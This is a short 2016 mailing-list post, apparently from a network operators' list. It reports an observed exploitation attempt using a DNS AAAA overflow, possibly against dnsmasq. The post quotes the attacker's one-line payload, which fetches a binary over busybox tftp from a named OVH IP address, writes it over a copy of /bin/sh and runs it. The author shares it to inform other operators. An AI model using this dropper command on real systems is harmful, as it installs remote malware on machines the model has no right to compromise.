Cloudflare, dirty networks and politricks

Alain Hebert ahebert at pubnix.net
Mon Aug 1 13:41:11 UTC 2016

    While on that subject,

    ( And by pure coincidence )

    Here is a little attempt of exploiting AAAA overflow (dnsmasq maybe)
using OVH as a payload distribution

AAAA cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g
91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh

    Obviously that host is not accessible at the moment. (GG OVH?)

    I'm suspecting that the CC used to create that VM got declined on
the 1st, which is often the case for payload distribution.

-----
Alain Hebert                                ahebert at pubnix.net
PubNIX Inc.
50 boul. St-Charles
P.O. Box 26770     Beaconsfield, Quebec     H9W 6G7
Tel: 514-990-5911  http://www.pubnix.net    Fax: 514-990-9443